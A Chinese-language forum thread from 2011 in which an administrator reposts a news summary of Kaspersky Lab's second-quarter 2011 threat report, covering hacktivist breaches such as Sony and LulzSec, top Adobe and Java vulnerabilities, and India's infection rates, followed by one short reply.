suiyajie suiyajie 当前离线 注册时间2011-7-22最后登录2011-12-1阅读权限200积分12152精华2帖子762. 窥视卡 雷达卡

管理员





串个门加好友打招呼发消息. 沙发
发表于 2011-8-24 23:00:10 |只看该作者 2011年第二季度可谓多事之秋,多个大公司遭黑客攻击。受害公司包

括索尼、丰田、福克斯新闻网、Epsilon和花旗银行。围绕索尼服务被黑的种种证据表明,黑客攻击的主要目的并不是为了赚钱,而是目前“黑客主义“浪潮的一部分。
据了解,网络黑客通过黑掉这些网站服务或系统,向政府或大型企业的行为进行抗议。目前,这种趋势越来越明显。今年第一季度,出现了一个名为LulzSec的新组织。该组织在50天内,成功黑掉多家公司的系统,将成千上万个用户个人资料公布到网上。

针对2011年第二季度大量IT威胁,卡巴斯基实验室的专家对数据进行分析后,得出了恶意威胁发展趋势。浏览网页仍然是最危险的互联网行为之一,因为有些恶意URL地址能够传播漏洞利用工具、僵尸程序、勒索软件或木马等。此类威胁是互联网上最常检测到的恶意对象(65.44%)。

本季度排名前10位的漏洞,均出自相关软件产品。这些软件均出自两个公司,分别为Adobe和Oracle(Java)。这是漏洞史上第一次出现此类现象。在排名前10位的漏洞中,仅来自Adobe Flash Player的漏洞就占了7个。

而在本地感染方面,排名前10位用户计算机本地感染高风险国家中,印度赫然在列。该国每两台计算机中,就有一台在过去三个月中至少遭受过一次本地感染。“在过去几年中,随着印度的计算机数量持续上升,也逐渐吸引了网络罪犯的注意。吸引网络罪犯的因素不仅如此,还包括其较低的计算机知识水平以及从不升级的盗版软件盛行等原因。”卡巴斯基实验室高级病毒分析师Yury Namestnikov解释说,“在僵尸网络控制者眼中,印度有数百万台未加防护以及未打补丁的计算机,能够保持僵尸网络较长时间的运营。




新注册用户发帖审核制度开启
使用道具 举报
照妖镜.


lyb123 lyb123 当前离线 注册时间2011-7-21最后登录2011-11-30阅读权限150积分2348精华0帖子214. 窥视卡 雷达卡

超级版主





串个门加好友打招呼发消息. 板凳
发表于 2011-8-25 20:50:22 |只看该作者 这个就要看国家的综合实力了


相关文档
相关文档 最新文档